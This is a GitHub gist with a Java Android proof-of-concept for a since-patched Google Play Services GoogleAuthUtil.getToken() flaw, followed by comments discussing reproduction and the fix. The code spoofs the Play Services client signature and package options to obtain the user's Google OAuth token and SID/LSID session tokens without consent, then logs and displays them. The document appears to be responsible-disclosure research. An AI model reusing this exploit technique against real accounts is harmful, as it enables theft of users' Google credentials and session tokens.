Skip to content

Instantly share code, notes, and snippets.

@isciurus
Last active May 12, 2024 23:45
Show Gist options
  • Save isciurus/df4d7edd9c3efb4a0753 to your computer and use it in GitHub Desktop.
Save isciurus/df4d7edd9c3efb4a0753 to your computer and use it in GitHub Desktop.
PoC for Android GoogleAuthUtil.getToken() bug
package com.isciurus.oauth_poc;
import java.io.IOException;
import java.text.DateFormat;
import java.util.Date;
import com.google.android.gms.auth.GoogleAuthException;
import com.google.android.gms.auth.GoogleAuthUtil;
import com.google.android.gms.auth.UserRecoverableAuthException;
import android.accounts.AccountManager;
import android.app.Activity;
import android.content.Intent;
import android.os.AsyncTask;
import android.os.Bundle;
import android.util.Log;
import android.widget.TextView;
public class MainActivity extends Activity {
public static String _log_str = null;
public static OAuthPoCtask task;
public String accountName = "";
@Override
protected void onActivityResult(int requestCode, int resultCode, Intent data) {
if (resultCode == RESULT_OK) {
accountName = data.getStringExtra(AccountManager.KEY_ACCOUNT_NAME);
Log.d("isciurus", "got primary account: " + accountName);
task = new OAuthPoCtask();
task.execute(this);
}
}
private class LeakEmail extends AsyncTask<MainActivity, String, String> {
@Override
protected String doInBackground(MainActivity... mContext) {
Log.d("isciurus", "getting primary account");
Intent aci = AccountManager.newChooseAccountIntent(null, null,
new String[]{"com.google"}, false, null, null, null, null);
startActivityForResult(aci, 0);
return null;
}
}
private class OAuthPoCtask extends AsyncTask<MainActivity, String, String> {
protected String doInBackground(MainActivity... mContext) {
String service = "SID";
String service2 = "LSID";
Bundle bdl = new Bundle();
bdl.putString("_opt_has_permission", "1");
bdl.putString("_opt_add_account", "1");
bdl.putString("_opt_system_partition", "1");
bdl.putString("_opt_client_sig", "58e1c4133f7441ec3d2c270270a14802da47ba0e");
bdl.putString("_opt_app", "com.google.android.gms");
String token0 = "", token01 = "", token1 = "", token2 = "";
try {
Log.d("isciurus", "[test 1]");
token0 = GoogleAuthUtil.getToken(mContext[0], accountName,
"oauth2:https://www.googleapis.com/auth/plus.login", bdl);
} catch (UserRecoverableAuthException e) {
Log.d("isciurus", "getting token failed, replacing the signature");
bdl.remove("_opt_client_sig");
bdl.putString("_opt_client_sig", "38918a453d07199354f8b19af05ec6562ced5788");
try {
token0 = GoogleAuthUtil.getToken(mContext[0], accountName,
"oauth2:https://www.googleapis.com/auth/plus.login", bdl);
} catch (UserRecoverableAuthException e1) {
e1.printStackTrace();
} catch (IOException e1) {
e1.printStackTrace();
} catch (GoogleAuthException e1) {
e1.printStackTrace();
}
} catch (GoogleAuthException e) {
e.printStackTrace();
}
catch (IOException e) {
e.printStackTrace();
}
if(token0 == "")
Log.d("isciurus", "[test 1] failed");
else
Log.d("isciurus", "[test 1] ok");
try {
Log.d("isciurus", "[test 2]");
token1 = GoogleAuthUtil.getToken(mContext[0], accountName, service, bdl);
} catch (UserRecoverableAuthException e) {
e.printStackTrace();
} catch (GoogleAuthException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
try {
token2 = GoogleAuthUtil.getToken(mContext[0], accountName, service2, bdl);
} catch (UserRecoverableAuthException e) {
e.printStackTrace();
} catch (GoogleAuthException e) {
e.printStackTrace();
}
catch (IOException e) {
e.printStackTrace();
}
if(token1 == "" || token2 == "")
Log.d("isciurus", "[test 2] fail");
else
Log.d("isciurus", "[test 2] ok");
_log_str = "token0=" + token0 + "\r\ntoken01=" + token01 + "\r\n" +
"SID=" + token1 + "\r\nLSID=" + token2;
Log.d("isciurus", _log_str);
runOnUiThread(new Runnable() {
@Override
public void run() {
TextView t=(TextView) findViewById(R.id.text1);
t.setText(MainActivity._log_str);
}
});
return "";
}
}
@SuppressWarnings("deprecation")
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
TextView t=(TextView) findViewById(R.id.text1);
t.setText("loading");
String currentDateTimeString = DateFormat.getDateTimeInstance().format(new Date());
Log.d("isciurus", currentDateTimeString);
LeakEmail leak_fn = new LeakEmail();
leak_fn.execute(this);
}
}
@myanimal
Copy link

myanimal commented Jan 9, 2015

Interesting. I can't reproduce the results though. I've tried on a couple of devices (Android 4 and 5), a couple of Play Services versions (both 6+) and a couple of Google accounts. Both tests always fail.

D/isciurus﹕ 9 Jan 2015 11:59:42
D/isciurus﹕ getting primary account
D/isciurus﹕ got primary account: me@gmail.com
D/isciurus﹕ [test 1]
W/System.err﹕ com.google.android.gms.auth.GoogleAuthException: Unknown
W/System.err﹕ at com.google.android.gms.auth.GoogleAuthUtil.getToken(Unknown Source)
D/isciurus﹕ [test 1] failed
D/isciurus﹕ [test 2]
W/System.err﹕ com.google.android.gms.auth.UserRecoverableAuthException: NeedPermission
W/System.err﹕ at com.google.android.gms.auth.GoogleAuthUtil.getToken(Unknown Source)
D/isciurus﹕ [test 2] fail
D/isciurus﹕ token0=
    token01=
    SID=
    LSID=

@captainepoch
Copy link

You could add the link of the article as a comment inside of the gist :-)

And good job!

@isciurus
Copy link
Author

isciurus commented Jan 9, 2015

2 myanimal:
You can try reproducing on older (before December 2, 2014) versions of Google Play before I reported it. I don't know how to downgrade, but I have an apk from that time.

@myanimal
Copy link

Thanks @isciurus, I can confirm this is reproducible on Play Services 6.1.11 (~ 3 October 2104). Looks like it's fixed in both the 6.1 and 6.5 branches. Good job and thanks for reporting it!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment